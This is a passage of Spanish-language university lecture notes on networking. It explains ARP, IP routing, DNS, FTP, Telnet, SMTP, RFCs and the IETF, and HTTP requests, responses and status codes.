ARP (Address Resolution Protocol).

El Protocolo de Resolución de Direcciones (ARP) es necesario debido a que las direcciones Ethernet y
las direcciones IP son dos números distintos y que no guardan ninguna relación. Así, cuando
pretendemos dirigirnos a un host a través de su dirección de Internet se necesita convertir ésta a la
correspondiente dirección Ethernet.

ARP es el protocolo encargado de realizar las conversiones de dirección correspondientes a cada host.
Para ello cada sistema cuenta con una tabla con la dirección IP y la dirección Ethernet de algunos de los
otros sistemas de la misma red. Sin embargo, también puede ocurrir que el ordenador de destino no se
encuentre en la tabla de direcciones, teniendo entonces que obtenerla por otros medios.

Con la finalidad de obtener una dirección Ethernet destino que no se encuentra en la tabla de
conversiones se utiliza el mensaje ARP de petición. Este mensaje es enviado como broadcast, es decir,
que estará disponible para que el resto de los sistemas de la red lo examinen, y el cual contiene una
solicitud de la dirección final de un sistema a partir de su dirección IP. Cuando el ordenador con el que se
quiere comunicar analiza este mensaje comprueba que la dirección IP corresponde a la suya y envía de
regreso el mensaje ARP de respuesta, el cual contendrá la dirección Ethernet que se estaba buscando.
El ordenador que solicitó la información recibirá entonces el mensaje de respuesta y añadirá la dirección
a su propia tabla de conversiones para futuras referencias.

El mensaje de petición ARP contiene las direcciones IP y Ethernet del host que solicita la información,
además de la dirección IP del host de destino. Estos mensajes son aprovechados en algunas ocasiones
también por otros sistemas de la red para actualizar sus tablas, ya que el mensaje es enviado en forma
de broadcast. El ordenador de destino, una vez que ha completado el mensaje inicial con su propia
dirección Ethernet, envía la respuesta directamente al host que solicitó la información.

3.12. Routing
Ya se ha expuesto anteriormente la forma en que los datagramas pasan de un ordenador de la red a otro
mediante el protocolo IP, sin embargo en esta sección se comenta con más detalle el proceso que
permite que la información llegue hasta su destino final. Esto se conoce con el nombre de routing.

Las tareas de routing son implementadas por el protocolo IP sin que los protocolos de un nivel superior
tales como TCP o UDP tengan constancia de ello. Cuando se quiere enviar información por Internet a un

____________________________________________________________________________________________________________________
UNdeC Página 36
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

ordenador, el protocolo IP comprueba si el ordenador de destino se encuentra en la misma red local que
el ordenador origen. Si es así, se enviará el correspondiente datagrama de forma directa: la cabecera IP
contendrá el valor de la dirección Internet del ordenador destino, y la cabecera Ethernet contendrá el
valor de la dirección de la red Ethernet que corresponde a este mismo ordenador.

Cuando se pretende enviar información a un ordenador remoto que está situado en una red local
diferente al ordenador de origen, el proceso resulta más complicado. Esto se conoce como routing
indirecto, y es el caso que se presenta más frecuentemente cuando se envía información en Internet. La
figura 1 muestra un ejemplo en el que dos redes locales que utilizan la tecnología de Internet se enlazan
para intercambiar información, creando una red lógica de mayor tamaño gracias a la funcionalidad del
protocolo IP.

En Internet existen un elevado número de redes independientes conectadas entre sí mediante el uso de
los routers. Un ordenador puede actuar como un router si se conecta a varias redes al mismo tiempo,
disponiendo por lo tanto de más de una interfaz de red así como de varias direcciones IP y Ethernet
(tantas como redes a las que se encuentre conectado). El router, por supuesto, puede enviar y recibir
información de los hosts de todas las redes a las que está conectado, y siempre será de forma directa.
Continuando con el ejemplo anterior, el host A puede comunicarse de forma directa con el host B, así
como los hosts A y B pueden enviar o recibir información del router. En ambos casos se trata de routing
directo, pues el ordenador que actúa como router está conectado a la red 'alfa' de la misma manera que
los ordenadores A y B, teniendo una dirección IP propia asignada que lo identifica dentro de esta misma
red. La situación es la misma para la red 'omega' donde el router es identificado a través de una segunda
dirección IP que corresponde con esta red.

Si sólo fuésemos a enviar información de manera directa dentro de una misma red no sería necesario el
uso del protocolo TCP/IP, siendo el mismo especialmente indicado cuando se desea una comunicación
con otras redes. En este caso los datagramas tendrán que ser encaminados a través del router para
llegar a su destino. La forma de hacer esto es a través del protocolo IP, el cual decide si la información
puede enviarse directamente o si por el contrario debe utilizarse el método indirecto a través de un
router. Tomamos de nuevo el ejemplo de la figura 1: Suponemos que el host B de la red 'alfa' necesita
comunicarse con el host X situado en la red 'omega'. Una vez que se ha determinado que el destino no
se encuentra en la misma red, envía el datagrama IP hacia el router correspondiente. Como este router y
el ordenador que envía la información se encuentran conectados a la misma red, se trata por tanto de
routing directo, ya comentado anteriormente, y por consiguiente sólo será necesario determinar la
dirección Ethernet del router mediante empleo del protocolo ARP. El paquete enviado incluirá la dirección
del router como dirección Ethernet de destino, pero sin embargo, la dirección de destino IP
corresponderá al ordenador final al que va dirigido el paquete, el host X en el ejemplo. El router recibe el
paquete y a través del protocolo IP comprueba que la dirección de Internet de destino no corresponde
con ninguna de las asignadas como suyas, procediendo entonces a determinar la localización de la
'omega', en la que se entrega el paquete al ordenador de destino.

Hasta este punto se ha supuesto que sólo existe un único router, pero es bastante probable que una red
con conexión a Internet posea múltiples enlaces con otras redes, y por lo tanto más de un router.
Entonces... ¿cómo determina el protocolo IP el sistema correcto al que debe dirigirse? Para resolver este
problema cada ordenador utiliza una tabla donde se relaciona cada una de las redes existentes con el
router que debe usarse para tener acceso. Debe tenerse en cuenta que los routers indicados en estas
tablas pueden no estar conectados directamente a las redes con las que están relacionados, sino que lo
que se indica es el mejor camino para acceder a cada una de ellas. Por esta razón, cuando un router
recibe un paquete que debe ser encaminado, busca en su propia tabla de redes la entrada
correspondiente a la red para, una vez encontrada, entregarlo al ordenador de destino. Es importante
notar que en el caso de que el router no tenga conexión directa a la misma red que el ordenador de
destino, la búsqueda en su tabla de redes dará como resultado la dirección de un nuevo router al que
dirigir el paquete, y así continuará el proceso sucesivamente hasta encontrar el destino final.

____________________________________________________________________________________________________________________
UNdeC Página 37
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

La figura 2 muestra la estructura de los protocolos para cada ordenador de Internet que se encuentre
conectado a una red Ethernet. Para un ordenador con más de un interfaz de red en el esquema
aparecerían todas las Ethernet con sus correspondientes protocolos ARP, pero en cualquier caso sería
un único protocolo IP el que se utilice, aunque éste disponga de varias direcciones asignadas.

A causa de la extensión de Internet, es normal que un paquete atraviese numerosas redes (pueden ser
decenas) hasta llegar a su destino. La ruta que tiene que recorrer un paquete en su viaje a través de la
red no está determinada inicialmente, sino que es el resultado de la consulta en las tablas de direcciones
individuales de los ordenadores intermedios.

La creación y mantenimiento de la tabla de redes para routing es un proceso complejo que debe ser
realizado por el administrador de la red. Aquí hay que tener en cuenta que la enorme extensión de
Internet supone una gran dificultad para conseguir que sean correctas todas las entradas de la tabla,
además de que esta tabla puede llegar a tener un tamaño considerable. La utilización de routers por
defecto mejora la situación al permitir que sean estos los que guarden el registro de la red sin que los
ordenadores individuales tengan que ocuparse en ello, pero estos routers sí que deberían tener una
tabla completa. Para facilitar el mantenimiento de la tabla existen algunos protocolos para routing que
permiten que un router o gateway cualquiera pueda encontrar por sí mismo la localización de otros
routers o gateways y guardar la información acerca del mejor camino para acceder a cada red.

Lógicamente el proceso real de routing sobre Internet suele ser mucho más complejo que el expuesto
aquí, principalmente por el uso de redes y tecnologías muy distintas e incompatibles. Esto obliga a que
se realicen conversiones en el formato de los paquetes para que puedan pasar a través de medios
diferentes, pero en cualquier caso el protocolo IP proporciona una transmisión transparente para los
protocolos de nivel superior y las aplicaciones de red.

3.13. Sistema de Nombres por Dominio


El sistema de nombres por dominio (DNS, Domain Name System) es una forma alternativa de identificar
a una máquina conectada a Internet. La dirección IP resulta difícil de memorizar, siendo su uso más
adecuado para los ordenadores. El sistema de nombres por dominio es el utilizado normalmente por las
personas para referirse a un ordenador en la red, ya que además puede proporcionar una idea del
propósito o la localización del mismo.

El nombre por dominio de un ordenador se representa de forma jerárquica con varios nombres
separados por puntos (generalmente 3 ó 4, aunque no hay límite). Típicamente el nombre situado a la
izquierda identifica al host, el siguiente es el subdominio al que pertenece este host, y a la derecha
estará el dominio de mayor nivel que contiene a los otros subdominios:

nombre_ordenador.subdominio.dominio_principal

Aunque esta situación es la más común, el nombre por dominio es bastante flexible, permitiendo no sólo
la identificación de hosts sino que también puede utilizarse para referirse a determinados servicios
proporcionados por un ordenador o para identificar a un usuario dentro del mismo sistema. Es el caso de
la dirección de correo electrónico, donde el nombre por dominio adquiere gran importancia puesto que el
número IP no es suficiente para identificar al usuario dentro de un ordenador.

Para que una máquina pueda establecer conexión con otra es necesario que conozca su número IP, por
lo tanto, el nombre por dominio debe ser convertido a su correspondiente dirección a través de la
correspondiente base de datos. En los inicios de Internet esta base de datos era pequeña de manera
que cada sistema podía tener su propia lista con los nombres y las direcciones de los otros ordenadores
de la red, pero actualmente esto sería impensable. Con esta finalidad se utilizan los servidores de
nombres por dominio (DNS servers).

Los servidores de nombres por dominio son sistemas que contienen bases de datos con el nombre y la
dirección de otros sistemas en la red de una forma encadenada o jerárquica.
____________________________________________________________________________________________________________________
UNdeC Página 38
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Para comprender mejor el proceso supongamos que un usuario suministra el nombre por dominio de un
sistema en la red a su ordenador local, realizándose el siguiente proceso:

El ordenador local entra en contacto con el servidor de nombres que tiene asignado, esperando
obtener la dirección que corresponde al nombre que ha suministrado el usuario.
El servidor de nombres local puede conocer la dirección que se está solicitando, entregándosela al
ordenador que realizó la petición.
Si el servidor de nombres local no conoce la dirección, ésta se solicitará al servidor de nombres que
esté en el dominio más apropiado. Si éste tampoco tiene la dirección, llamará al siguiente servidor
DNS, y así sucesivamente.
Cuando el servidor DNS local ha conseguido la dirección, ésta se entrega al ordenador que realizó la
petición.
Si el nombre por dominio no se ha podido obtener, se enviará de regreso el correspondiente
mensaje de error.

3.14. Servicios de Internet: el nivel de Aplicación


Los diferentes servicios a los que podemos tener acceso en Internet son proporcionados por los
protocolos que pertenecen al nivel de aplicación. Estos protocolos forman parte del TCP/IP y deben
aportar entre otras cosas una forma normalizada para interpretar la información, ya que todas las
máquinas no utilizan los mismos juegos de caracteres ni los mismos estándares. Los protocolos de los
otros niveles sólo se encargan de la transmisión de información como un bloque de bits, sin definir las
normas que indiquen la manera en que tienen que interpretarse esos bits. Los protocolos del nivel de
aplicación están destinados a tareas específicas, algunos de los cuales se consideran como tradicionales
de Internet por utilizarse desde los inicios de la red, como son por ejemplo:

Transferencia de ficheros (File Transfer).


Correo electrónico (e-mail).
Conexión remota (remote login).

3.15. Transferencia de Ficheros


El protocolo FTP (File Transfer Protocol) se incluye como parte del TCP/IP, siendo éste el protocolo de
nivel de aplicación destinado a proporcionar el servicio de transferencia de ficheros en Internet. El FTP
depende del protocolo TCP para las funciones de transporte, y guarda alguna relación con TELNET
(protocolo para la conexión remota).

El protocolo FTP permite acceder a algún servidor que disponga de este servicio y realizar tareas como
moverse a través de su estructura de directorios, ver y descargar ficheros al ordenador local, enviar
ficheros al servidor o copiar archivos directamente de un servidor a otro de la red. Lógicamente y por
motivos de seguridad se hace necesario contar con el permiso previo para poder realizar todas estas
operaciones. El servidor FTP pedirá el nombre de usuario y clave de acceso al iniciar la sesión (login),
que debe ser suministrado correctamente para utilizar el servicio.

La manera de utilizar FTP es por medio de una serie de comandos, los cuales suelen variar dependiendo
del sistema en que se esté ejecutando el programa, pero básicamente con la misma funcionalidad.
Existen aplicaciones de FTP para prácticamente todos los sistemas operativos más utilizados, aunque
hay que tener en cuenta que los protocolos TCP/IP están generalmente muy relacionados con sistemas
UNIX. Por este motivo y, ya que la forma en que son listados los ficheros de cada directorio depende del
sistema operativo del servidor, es muy frecuente que esta información se muestre con el formato propio
del UNIX. También hay que mencionar que en algunos sistemas se han desarrollado clientes de FTP
que cuentan con un interfaz gráfico de usuario, lo que facilita notablemente su utilización, aunque en
algunos casos se pierde algo de funcionalidad.

____________________________________________________________________________________________________________________
UNdeC Página 39
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Existe una forma muy utilizada para acceder a fuentes de archivos de carácter público por medio de
FTP. Es el acceso FTP anónimo, mediante el cual se pueden copiar ficheros de los hosts que lo
permitan, actuando estos host como enormes almacenes de información y de todo tipo de ficheros para
uso público. Generalmente el acceso anónimo tendrá algunas limitaciones en los permisos, siendo
normal en estos casos que no se permita realizar acciones tales como añadir ficheros o modificar los
existentes. Para tener acceso anónimo a un servidor de FTP hay que identificarse con la palabra
"anonymous" como el nombre de usuario, tras lo cual se pedirá el password o clave correspondiente.
Normalmente se aceptará cualquier cadena de caracteres como clave de usuario, pero lo usual es que
aquí se indique la dirección de correo electrónico propia, o bien la palabra "guest". Utilizar la dirección de
correo electrónico como clave de acceso es una regla de cortesía que permite a los operadores y
administradores hacerse una idea de los usuarios que están interesados en el servicio, aunque en
algunos lugares puede que se solicite esta información rechazando el uso de la palabra "guest".

E FTP proporciona dos modos de transferencia de ficheros: ASCII y binario. El modo de transferencia
ASCII se utiliza cuando se quiere transmitir archivos de texto, ya que cada sistema puede utilizar un
formato distinto para la representación de texto. En este caso se realiza una conversión en el formato del
fichero original, de manera que el fichero recibido pueda utilizarse normalmente. El modo de
transferencia binario se debe utilizar en cualquier otro caso, es decir, cuando el fichero que vamos a
recibir contiene datos que no son texto. Aquí no se debe realizar ninguna conversión porque quedarían
inservibles los datos del fichero.

3.16. Conexión Remota


El protocolo diseñado para proporcionar el servicio de conexión remota (remote login) recibe el nombre
de TELNET, el cual forma parte del conjunto de protocolos TCP/IP y depende del protocolo TCP para el
nivel de transporte.

El protocolo TELNET es un emulador de terminal que permite acceder a los recursos y ejecutar los
programas de un ordenador remoto en la red, de la misma forma que si se tratara de un terminal real
directamente conectado al sistema remoto. Una vez establecida la conexión el usuario podrá iniciar la
sesión con su clave de acceso. De la misma manera que ocurre con el protocolo FTP, existen servidores
que permiten un acceso libre cuando se especifica "anonymous" como nombre de usuario.

Es posible ejecutar una aplicación cliente TELNET desde cualquier sistema operativo, pero hay que
tener en cuenta que los servidores suelen ser sistemas VMS o UNIX por lo que, a diferencia del
protocolo FTP para transferencia de ficheros donde se utilizan ciertos comandos propios de esta
aplicación, los comandos y sintaxis que se utilice en TELNET deben ser los del sistema operativo del
servidor. El sistema local que utiliza el usuario se convierte en un terminal "no inteligente" donde todos
los caracteres pulsados y las acciones que se realicen se envían al host remoto, el cual devuelve el
resultado de su trabajo. Para facilitar un poco la tarea a los usuarios, en algunos casos se encuentran
desarrollados menús con las distintas opciones que se ofrecen.

Los programas clientes de TELNET deben ser capaces de emular los terminales en modo texto más
utilizados para asegurarse la compatibilidad con otros sistemas, lo que incluye una emulación del
teclado. El terminal más extendido es el VT100, el cual proporciona compatibilidad con la mayoría de los
sistemas, aunque puede ser aconsejable que el programa cliente soporte emulación de otro tipo de
terminales.

3.17. Correo Electrónico


El servicio de correo electrónico se proporciona a través del protocolo SMTP (Simple Mail Transfer
Protocol), y permite enviar mensajes a otros usuarios de la red. A través de estos mensajes no sólo se
puede intercambiar texto, sino también archivos binarios de cualquier tipo.

____________________________________________________________________________________________________________________
UNdeC Página 40
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Generalmente los mensajes de correo electrónico no se envían directamente a los ordenadores


personales de cada usuario, puesto que en estos casos puede ocurrir que esté apagado o que no esté
ejecutando la aplicación de correo electrónico. Para evitar este problema se utiliza un ordenador más
grande como almacén de los mensajes recibidos, el cual actúa como servidor de correo electrónico
permanentemente. Los mensajes permanecerán en este sistema hasta que el usuario los transfiera a su
propio ordenador para leerlos de forma local.

3.18. El acceso a Internet


El acceso a Internet es proporcionado por cualquier proveedor que disponga de esta posibilidad, para lo
cual se hace completamente necesario el protocolo TCP/IP. El número IP que dispondrá como dirección
el ordenador del usuario final es suministrado por el proveedor (puede ser distinto cada vez que se
establezca una conexión) y será una dirección válida de Internet.

3.19. Otras Fuentes de Información


Todos los protocolos y estándares que se consolidan como propios de Internet han de ser organizados y
dirigidos de alguna manera. Esta es la misión principal del IETF (Internet Engineering Task Force), que
es una gran comunidad de carácter abierto formada por diseñadores de redes, operadores, usuarios, etc.
Todos los protocolos agrupados normalmente bajo el nombre TCP/IP son estándares de Internet cuyo
desarrollo depende del IETF. Las actividades que realiza el IETF se dividen en distintos grupos, llamados
Working Groups (WG) con finalidades específicas, los cuales se clasifican en distintas áreas comunes
(Aplicaciones, seguridad, estandarización, servicios de transporte, etc.). El IESG (Internet Engineering
Steering Group) se encarga de coordinar y dirigir al IETF por medio de los directores de área, que
controlan las actividades número de los Working Groups que se encuentren dentro de cada área.

Las tareas de coordinación de los números asignados a los distintos protocolos de Internet están a cargo
de IANA (Internet Assigned Numbers Authority). Los protocolos definidos por el IETF y su grupo de
dirección correspondiente IESG contienen ciertos valores tales como: direcciones de Internet, números
de protocolos y de puertos, nombres por dominio, etc. La funcionalidad de IANA está en que todos estos
parámetros deben ser únicos, y por tanto, debe existir un registro que controle los valores que se
encuentran asignados.

Request for Comments.

Los documentos denominados Request for Comments (RFC) contienen información de gran interés
acerca de Internet. Existen miles de estos documentos con información sobre cualquier aspecto
relacionado con la red. Los RFC comenzaron a funcionar sobre el año 1969 como un medio informal de
intercambio de ideas entre la comunidad investigadores de temas concernientes a las redes. Estos
documentos se distribuían inicialmente de forma impresa por correo convencional hasta que la
transferencia de ficheros a través de FTP (File Transfer Protocol) se comenzó a utilizar. Con el paso del
tiempo los RFC se han convertido en una manera más oficial de presentar los protocolos de Internet,
aunque aún se crean algunos de estos documentos con carácter únicamente informativo.

Los RFC se utilizan actualmente para fines de investigación y desarrollo de Internet por el Network
Working Group, y en ellos se documentan los protocolos y estándares ya existentes, o bien las
propuestas de nuevos protocolos o nuevas versiones de los actuales esperándose que se conviertan en
un estándar. A cada RFC se le asigna un número siempre distinto para poder identificarlo, incluso
cuando un RFC ya existente se modifica o actualiza se obtendrá un nuevo documento con su propio
número exclusivo. Por este motivo y como las revisiones se producen continuamente se hace necesario
el uso de un índice en el que se puede encontrar el número correspondiente a la última revisión de un
determinado documento.

____________________________________________________________________________________________________________________
UNdeC Página 41
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Cualquiera que lo desee puede elaborar un texto para que sea editado y publicado como un nuevo RFC
por medio de una persona que actúa como editor (consultar RFC 2200 para más información). Sin
embargo, si lo que pretende documentar en un nuevo RFC es un protocolo estándar o la propuesta
correspondiente para ello, primero se debe notificar al IESG (Internet Engineering Steering Group).

Para que un protocolo de Internet se convierta en un estándar debe pasar por una serie de estados o
niveles. El nivel de proposición de protocolo es asignado cuando un protocolo tiene posibilidades de
convertirse en un estándar en el futuro, siendo recomendables algunas pruebas y revisiones hasta que el
IESG considere su avance. Después del nivel de proposición el protocolo puede pasar a considerarse
como un "borrador" (draft standard). Esto sólo ocurrirá cuando hayan transcurrido al menos 6 meses
desde el nivel anterior, permitiendo de esta manera que la comunidad de Internet evalúe y considere el
proceso de estandarización. Durante otros 4 meses el protocolo permanecerá en este nivel mientras se
hacen pruebas y se analizan los comentarios recibidos con la posibilidad de efectuar algún cambio.
Finalmente, el protocolo puede llegar a convertirse en un estándar oficial de Internet a través del IESG
cuando su funcionalidad ha quedado suficientemente demostrada.

El carácter abierto con que se trata a esta información sobre los aspectos de diseño de la red permite
que Internet evolucione y se desarrolle de una manera rápida y eficaz. Cualquiera puede tener acceso a
todos los RFC creados desde el comienzo, los cuales se conservan como información de consulta y
registro.

____________________________________________________________________________________________________________________
UNdeC Página 42
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

4. APLICACIONES DE RED

Nivel de capa OSI 7.


Ofrece a las aplicaciones (de usuario o no) la posibilidad de acceder a los servicios de las demás capas
y define los protocolos que utilizan las aplicaciones para intercambiar datos, como correo electrónico
(POP y SMTP), gestores de bases de datos y servidor de ficheros (FTP). Hay tantos protocolos como
aplicaciones distintas y puesto que continuamente se desarrollan nuevas aplicaciones el número de
protocolos crece sin parar.
Cabe aclarar que el usuario normalmente no interactúa directamente con el nivel de aplicación. Suele
interactuar con programas que a su vez interactúan con el nivel de aplicación pero ocultando la
complejidad subyacente. Así por ejemplo un usuario no manda una petición "HTTP/1.0 GET index.html"
para conseguir una página en html, ni lee directamente el código html/xml.
Entre los protocolos (refiriéndose a protocolos genéricos, no a protocolos de la capa de aplicación de
OSI) más conocidos destacan:
HTTP (HyperText Transfer Protocol) el protocolo bajo la www
FTP (File Transfer Protocol) ( FTAM, fuera de TCP/IP) transferencia de ficheros
SMTP (Simple Mail Transfer Protocol) (X.400 fuera de tcp/ip) envío y distribución de correo
electrónico
POP (Post Office Protocol)/IMAP: reparto de correo al usuario final
SSH (Secure SHell) principalmente terminal remoto, aunque en realidad cifra casi cualquier tipo
de transmisión.
Telnet otro terminal remoto, ha caído en desuso por su inseguridad intrínseca, ya que las claves
viajan sin cifrar por la red.
Hay otros protocolos de nivel de aplicación que facilitan el uso y administración de la red:
SNMP (Simple Network Management Protocol)
DNS (Domain Name System)

4.1 HTTP
El protocolo de transferencia de hipertexto (HTTP, HyperText Transfer Protocol) es el protocolo usado en
cada transacción de la Web (WWW). El hipertexto es el contenido de las páginas web, y el protocolo de
transferencia es el sistema mediante el cual se envían las peticiones de acceso a una página y la
respuesta con el contenido. También sirve el protocolo para enviar 'información adicional en ambos
sentidos, como formularios con campos de texto.
HTTP es un protocolo sin estado, es decir, que no guarda ninguna información sobre conexiones
anteriores. Al finalizar la transacción todos los datos se pierden. Por esto se popularizaron las cookies,
que son pequeños ficheros guardados en el propio ordenador que puede leer un sitio web al establecer
conexión con él, y de esta forma reconocer a un visitante que ya estuvo en ese sitio anteriormente.
Gracias a esta identificación, el sitio web puede almacenar gran número de información sobre cada
visitante, ofreciéndole así un mejor servicio.
La versión actual de HTTP es la 1.1, HTTP dispone de una variante cifrada mediante SSL llamada
HTTPS.

Transacciones HTTP
El protocolo HTTP está basado en el modelo cliente-servidor. Un cliente HTTP abre una conexión y
envía su solicitud al servidor, el cual responderá con el recurso solicitado —si está disponible y su
acceso es permitido— y la conexión se cierra.
El formato tanto del mensaje como de la respuesta es como sigue (separando las líneas con la
secuencia retorno de carro-nueva línea):

<Linea inicial>
Cabecera-1: valor-1
...(Common Object Interface Generator)
Cabecera-n: valor-n
<Cuerpo del mensaje (Opcional)>

____________________________________________________________________________________________________________________
UNdeC Página 43
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

La línea inicial es diferente en las solicitudes y en las respuestas. En las solicitudes está formada por tres
campos que se separan con un espacio en blanco: "Método recurso versión-del-protocolo". Por ejemplo:
"GET /path/to/file/index.html HTTP/1.0". La línea inicial de una respuesta tiene tres campos separados
por un espacio: "versión-del-protocolo código-respuesta mensaje". Por ejemplo: "HTTP/1.0 200 OK".
Los encabezados están normados en el protocolo, e incluyen, en el caso de una solicitud, información
del navegador y eventualmente del usuario cliente; En el caso de una respuesta, información sobre el
servidor y sobre el recurso. El cuerpo del mensaje contiene el recurso a transferir o el texto de un error
en el caso de una respuesta. En el caso de una solicitud, puede contener parámetros de la llamada
archivos enviados al servidor.
Actualmente viene remplazando al FTP en la transferencia de archivos. El servidor Apache permite el
uso de los llamados ―distributed configuration files‖, osea ―ficheros de configuración distribuidos‖. Estos
permiten personalizar el funcionamiento del servidor en un directorio concreto sin necesidad de modificar
el fichero de configuración principal de Apache, el ―httpd.conf‖.

Ejemplo de un diálogo HTTP


Para obtener un recurso con el URL http://www.example/index.html

1. Se abre un socket con el host www.tuhost.example, puerto 80 que es el puerto por defecto para
HTTP.
2. Se envía un mensaje en el estilo siguiente:

GET /index.html HTTP/1.0


Host: www.example.com
User-Agent: HTTPTool/1.0
[Línea en blanco]

La respuesta del servidor está formada por encabezados seguidos del recurso solicitado, en el caso de
una página web:

HTTP/1.0 200 OK
Date: Fri, 31 Dec 2003 23:59:59 GMT
Content-Type: text/html
Content-Length: 1221

<html>
<body>
<h1>Página principal de tuHost</h1>
(Contenido)
.
.
.
</body>
</html>

Al recibirse la respuesta, el servidor cierra la comunicación. Cabe señalar que los principales
navegadores web no muestran al usuario los encabezados HTTP del recurso. Para visualizar tales
encabezados pueden utilizarse herramientas conocidas genéricamente como "visores HTTP". Son
especialmente cómodos de utilizar los visores HTTP on-line. Se puede acceder a gran variedad de estas
herramientas buscando "http viewer" en cualquier buscador automático. En español no existe tanta
abundancia de visores HTTP on line: podemos señalar, por ejemplo, el visor sencillo que ofrece
www.cibernetia.com.

Herramientas de Software libre


Apache httpd server Apache ha sido el servidor web más difundido desde 1996. La encuesta de Netcraft
de abril de 2005, muestra que alrededor del 70% de los servidores web utilizan Apache, y la parte de
mercado crece de año en año.

Jigsaw - W3C's Server


Roxen

____________________________________________________________________________________________________________________
UNdeC Página 44
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Zope : Un poderoso servidor web implementado en python con soporte para conexiones a bases
de datos, extensibilidad sencilla y administración vía web.

Primeros Servidores
CERN httpd Server
NCSA httpd server
Compuserve httpd server

Glosario
Sockets
Debe entenderse como punto de conexión en español. Son puntos de comunicación de datos que se
clasifican en físicos (asociados a un recurso) o lógicos (manejados por el sistema operativo). Hay tres
elementos que caracterizan a un socket: El nombre del servicio (telnet, ftp, etc.), el protocolo (TCP, UDP,
etc.) y el número de puerto. En Linux, el archivo /etc/protocols contiene la lista de protocolos disponibles
y /etc/services contiene la lista de servicios disponibles. Por ejemplo, en la configuración inicial de la
mayoría de los sistemas Linux se tiene que:

el servicio telnet utiliza el protocolo TCP/IP y se comunica por el puerto 23


el servicio ftp utiliza el protocolo TCP/IP y se comunica por los puertos 20 y 21
el servicio WWW utiliza el protocolo HTTP y se comunica por el puerto 80.
el servicio WebDAV para desarrollo en colaboración utiliza el protocolo HTTP como transporte.
CORBA, el marco para compartir objetos y servicios en la red puede utilizar el protocolo HTTP
como transporte.

Recursos
HTTP se utiliza para transmitir recursos, que incluyen además de archivos, el resultado de la ejecución
de un programa, una consulta a una base de datos, la traducción automática de un documento, etc. Para
un servidor HTTP, los recursos son o bien archivos, o bien el resultado de la ejecución de un programa.

Códigos de respuesta
Son códigos de tres dígitos:

1xx Mensajes de información

N° Descripción
100 Continúa
101 Cambio de protocolo

2xx Operación exitosa

N° Descripción
200 OK
201 Creado
202 Aceptado
203 Información no oficial
204 Sin Contenido
205 Contenido para recargar
206 Contenido parcial

3xx Redirección hacia otro URL

N° Descripción
300 Múltiples posibilidades
301 Mudado permanentemente

____________________________________________________________________________________________________________________
UNdeC Página 45
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

302 Encontrado
303 Vea otros
304 No modificado
305 Utilice un proxy
307 Redirección temporal

4xx Error por parte del cliente

N° Descripción
400 Solicitud incorrecta
401 No autorizado
402 Pago requerido
403 Prohibido
404 No encontrado
405 Método no permitido
406 No aceptable
407 Proxy requerido
408 Tiempo de espera agotado
409 Conflicto
410 Ya no disponible
411 Requiere longitud
412 Falló precondición
413 Entidad de solicitud demasiado larga
414 URL de solicitud demasiado largo
415 Tipo de medio no soportado
416 Rango solicitado no disponible
417 Falló expectativa

5xx Error por parte del servidor

N° Descripción
500 Error interno
501 No implementado
502 Pasarela incorrecta
503 Servicio no disponible
504 Tiempo de espera de la pasarela agotado
505 Versión de HTTP no soportada

4.2. FTP
FTP (File Transfer Protocol) es un protocolo de transferencia de archivos entre sistemas conectados a
una red TCP basado en la arquitectura cliente-servidor, de manera que desde un equipo cliente nos
podemos conectar a un servidor para descargar archivos desde él o para enviarle nuestros propios
archivos independientemente del sistema operativo utilizado en cada equipo.
El Servicio FTP es ofrecido por la capa de Aplicación del modelo de capas de red TCP/IP al usuario,
utilizando normalmente el puerto de red 20 y el 21. Un problema básico de FTP es que está pensado
para ofrecer la máxima velocidad en la conexión, pero no la máxima seguridad, ya que todo el
intercambio de información, desde el login y password del usuario en el servidor hasta la transferencia de
cualquier archivo, se realiza en texto plano sin ningún tipo de cifrado, con lo que un posible atacante lo
tiene muy fácil para capturar este tráfico, acceder al servidor, o apropiarse de los archivos transferidos.
Para solucionar este problema son de gran utilidad aplicaciones como scp y sftp, incluidas en el paquete
SSH, que permiten transferir archivos pero cifrando todo el tráfico.

Un poco de historia

____________________________________________________________________________________________________________________
UNdeC Página 46
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

En 1971, el mismo año en que nació ARPANET (Historia de Internet) como una pequeña red de pocos
ordenadores que transmitían información de unos a otros mediante paquetes conmutados (lo que sería
en el futuro Internet), un grupo de investigadores del MIT presentó la propuesta del primer "Protocolo
para la transmisión de archivos en Internet" (RFC 114). Era un protocolo muy sencillo basado en el
sistema de correo electrónico pero sentó las bases para el futuro protocolo de transmisión de archivos
(FTP).
En 1985, quince años después de la primera propuesta, se termina el desarrollo del aún vigente
protocolo para la transmisión de archivos en Internet (FTP), basado en la filosofía de cliente-servidor.
El gran boom de Internet se produce en 1995. Este año puede ser considerado como el nacimiento de la
Internet comercial. Desde ese momento su crecimiento ha superado todas las expectativas. En este año
la World Wide Web supera a FTP transformándose en el servicio preferido de la red, después de que el
año anterior superase en popularidad a Telnet.
Con la llegada del World Wide Web, y de los navegadores , ya no es necesario conocer los complejos
comandos de FTP, este protocolo se puede utilizar escribiendo la URL del servidor al que queramos
conectar en el navegador web, indicando con ftp:// que vamos a contactar con un servidor ftp y no con un
servidor web (que sería http:// ).

El Modelo FTP
El siguiente modelo representa el diagrama de un servicio FTP.

En el modelo, el intérprete de protocolo (PI) de usuario, inicia la conexión de control en el puerto 21. Las
órdenes FTP estándar las genera el PI de usuario y se transmiten al proceso servidor a través de la
conexión de control. Las respuestas estándar se envían desde el PI del servidor al PI de usuario por la
conexión de control como contestación a las órdenes.
Estas órdenes FTP especifican parámetros para la conexión de datos (puerto de datos, modo de
transferencia, tipo de representación y estructura) y la naturaleza de la operación sobre el sistema de
archivos (almacenar, recuperar, añadir, borrar, etc.). El proceso de transferencia de datos (DTP) de
usuario u otro proceso en su lugar, debe esperar a que el servidor inicie la conexión al puerto de datos
